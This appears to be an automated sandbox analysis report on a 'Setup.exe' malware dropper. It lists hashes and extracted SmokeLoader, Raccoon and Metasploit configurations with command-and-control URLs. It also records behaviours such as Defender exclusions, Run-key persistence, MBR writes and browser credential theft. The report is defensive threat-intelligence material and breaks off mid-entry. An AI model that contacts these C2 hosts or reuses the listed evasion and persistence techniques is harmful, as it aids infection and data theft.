Analysis
-
max time kernel
125s -
max time network
132s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
13-02-2021 11:08
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Setup.exe
Resource
win10v20201028
Errors
General
-
Target
Setup.exe
-
Size
5.0MB
-
MD5
edeb50f0b803732a581ab558bf87d968
-
SHA1
35858ce564d4c8b080bae606bf67292f5b9b2201
-
SHA256
ee9743026ad49017735e58c3d9ee9198db87eb6a3ab77242aa9d15155a9504b6
-
SHA512
8c47a7964791452fc499046d60b08b99f7a986b3827cddeba88b20e91c0ff69475314f17662c33286f421d433fb507a9c673bcce75f0c5bb333ca6e58b219273
Malware Config
Extracted
smokeloader
2020
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
http://4zavr.com/upload/
http://zynds.com/upload/
http://atvua.com/upload/
http://detse.net/upload/
http://dsdett.com/upload/
http://dtabasee.com/upload/
http://yeronogles.monster/upload/
Extracted
raccoon
17694a35d42ac97e2cd3ebd196db01b372cce1b0
-
url4cnc
https://telete.in/o23felk0s
Extracted
raccoon
027bc1bb9168079d5f7473eee9c05ee06589c305
-
url4cnc
https://telete.in/jjbadb0y
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Signatures
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/3208-192-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba behavioral2/memory/3208-193-0x0000000001590000-0x0000000001D92000-memory.dmp family_glupteba behavioral2/memory/3208-195-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral2/memory/5108-121-0x0000000002360000-0x000000000238E000-memory.dmp family_redline behavioral2/memory/5108-126-0x00000000024F0000-0x000000000251C000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 5716 created 3208 5716 svchost.exe 146 PID 5716 created 6100 5716 svchost.exe 166 PID 5716 created 6100 5716 svchost.exe 166 PID 5716 created 6100 5716 svchost.exe 166 -
Modifies boot configuration data using bcdedit 15 IoCs
pid Process 4064 bcdedit.exe 3100 bcdedit.exe 4468 bcdedit.exe 5432 bcdedit.exe 5436 bcdedit.exe 5256 bcdedit.exe 5948 bcdedit.exe 5892 bcdedit.exe 6028 bcdedit.exe 5824 bcdedit.exe 6080 bcdedit.exe 6052 bcdedit.exe 5768 bcdedit.exe 6108 bcdedit.exe 5296 bcdedit.exe -
Nirsoft 6 IoCs
resource yara_rule behavioral2/files/0x000200000001ab8f-25.dat Nirsoft behavioral2/files/0x000200000001ab8f-26.dat Nirsoft behavioral2/files/0x000300000001ab8f-34.dat Nirsoft behavioral2/files/0x000300000001ab8f-35.dat Nirsoft behavioral2/files/0x000300000001a2df-41.dat Nirsoft behavioral2/files/0x000300000001a2df-42.dat Nirsoft -
Executes dropped EXE 36 IoCs
pid Process 1328 6489A2274AE24900.exe 1196 6489A2274AE24900.exe 4084 1613214372547.exe 2132 1613214377312.exe 3820 1613214382562.exe 188 ThunderFW.exe 3060 MiniThunderPlatform.exe 4040 23E04C4F32EF2158.exe 2192 23E04C4F32EF2158.tmp 1724 seed.sfx.exe 3128 seed.exe 4844 9451.exe 4864 9666.exe 4884 9A8D.exe 5108 A339.exe 3192 9451.exe 4496 AB48.exe 4948 B607.exe 4988 B8A8.exe 5032 updatewin1.exe 1740 updatewin2.exe 4628 updatewin.exe 5052 BFFC.exe 4632 B8A8.exe 3908 jfiag3g_gg.exe 4680 5.exe 3208 C8A8.exe 5336 D0F6.exe 5632 jfiag3g_gg.exe 5748 C8A8.exe 6100 csrss.exe 5292 patch.exe 4372 24E3.exe 5144 2AB1.exe 4732 24E3.exe 5676 SmartClock.exe -
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
resource yara_rule behavioral2/files/0x000100000001ab91-4.dat office_xlm_macros -
resource yara_rule behavioral2/files/0x0004000000000687-79.dat upx behavioral2/files/0x0004000000000687-80.dat upx behavioral2/files/0x000200000001ac98-151.dat upx behavioral2/files/0x000200000001ac98-149.dat upx behavioral2/memory/5136-175-0x0000000004270000-0x0000000004271000-memory.dmp upx behavioral2/memory/4732-222-0x0000000000400000-0x00000000047FC000-memory.dmp upx behavioral2/memory/4732-226-0x0000000000400000-0x00000000047FC000-memory.dmp upx -
resource yara_rule behavioral2/memory/5784-241-0x0000000000F20000-0x0000000001939000-memory.dmp vmprotect -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk 24E3.exe -
Loads dropped DLL 28 IoCs
pid Process 1356 MsiExec.exe 1328 6489A2274AE24900.exe 1328 6489A2274AE24900.exe 3060 MiniThunderPlatform.exe 3060 MiniThunderPlatform.exe 3060 MiniThunderPlatform.exe 3060 MiniThunderPlatform.exe 3060 MiniThunderPlatform.exe 3060 MiniThunderPlatform.exe 3060 MiniThunderPlatform.exe 3060 MiniThunderPlatform.exe 3128 seed.exe 4496 AB48.exe 4864 9666.exe 4864 9666.exe 4632 B8A8.exe 4680 5.exe 4680 5.exe 5336 D0F6.exe 5336 D0F6.exe 5336 D0F6.exe 5336 D0F6.exe 5336 D0F6.exe 5336 D0F6.exe 5292 patch.exe 5292 patch.exe 5292 patch.exe 5292 patch.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 5080 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C8A8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\AgedGlade = "0" C8A8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C8A8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C8A8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C8A8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" C8A8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C8A8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\C8A8.exe = "0" C8A8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C8A8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C8A8.exe -
resource yara_rule behavioral2/memory/5784-241-0x0000000000F20000-0x0000000001939000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\1b28d49a-b6d6-4a54-ba7e-567865d12d68\\9451.exe\" --AutoStart" 9451.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" BFFC.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\AgedGlade = "\"C:\\Windows\\rss\\csrss.exe\"" C8A8.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA B607.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\U: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 86 api.2ip.ua 87 api.2ip.ua 105 api.2ip.ua 131 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Setup.exe File opened for modification \??\PhysicalDrive0 6489A2274AE24900.exe File opened for modification \??\PhysicalDrive0 6489A2274AE24900.exe File opened for modification \??\PhysicalDrive0 MiniThunderPlatform.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1108 Setup.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 1328 set thread context of 2760 1328 6489A2274AE24900.exe 88 PID 1328 set thread context of 1604 1328 6489A2274AE24900.exe 97 PID 1328 set thread context of 3244 1328 6489A2274AE24900.exe 99 PID 4988 set thread context of 4632 4988 B8A8.exe 137 PID 4372 set thread context of 4732 4372 24E3.exe 175 -
Drops file in Program Files directory 48 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\HappyNewYear\seed.sfx.exe 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-GNF6L.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-BOO8P.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-SM9IM.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-KME6S.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\Seed Trade\Seed\__tmp_rar_sfx_access_check_259341328 seed.sfx.exe File created C:\Program Files (x86)\HappyNewYear\is-HDGVQ.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-SPMRF.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-O3J5H.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-DANT8.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-F3AJ4.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-G1EED.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-VK95O.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-7OKKR.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-VP0H1.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-O9JFG.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-P14CO.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-B16CD.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\lang\is-RU17G.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-TAGTO.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\Seed Trade seed.sfx.exe File opened for modification C:\Program Files (x86)\Seed Trade\Seed seed.sfx.exe File created C:\Program Files (x86)\HappyNewYear\is-9A12A.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-SKVC9.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-V1D5A.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-25888.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-VEEBP.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-MCCJH.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-QI8NS.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\HappyNewYear\DreamTrip.exe 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-4F79S.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-3MCF0.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-IB0KV.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-NLJMI.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-985JG.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-TKRMN.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-COJG8.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\unins000.dat 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-39NAN.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-2R3TK.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-1Q0TS.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-3S6HP.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\lang\is-M14SC.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\HappyNewYear\unins000.dat 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-I246A.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-IF4CC.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\Seed Trade\Seed\seed.exe seed.sfx.exe File opened for modification C:\Program Files (x86)\Seed Trade\Seed\seed.exe seed.sfx.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\rss C8A8.exe File created C:\Windows\rss\csrss.exe C8A8.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 5136 4948 WerFault.exe 131 -
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName 6489A2274AE24900.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI B8A8.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AB48.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AB48.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 6489A2274AE24900.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 6489A2274AE24900.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AB48.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 6489A2274AE24900.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName 6489A2274AE24900.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI B8A8.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI B8A8.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 6489A2274AE24900.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 9666.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 9666.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5180 schtasks.exe 1192 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 3888 timeout.exe 5828 timeout.exe 4896 timeout.exe -
Kills process with taskkill 3 IoCs
pid Process 2832 taskkill.exe 5244 taskkill.exe 5912 taskkill.exe -
Modifies Control Panel 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Colors MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" csrss.exe Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Control netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = 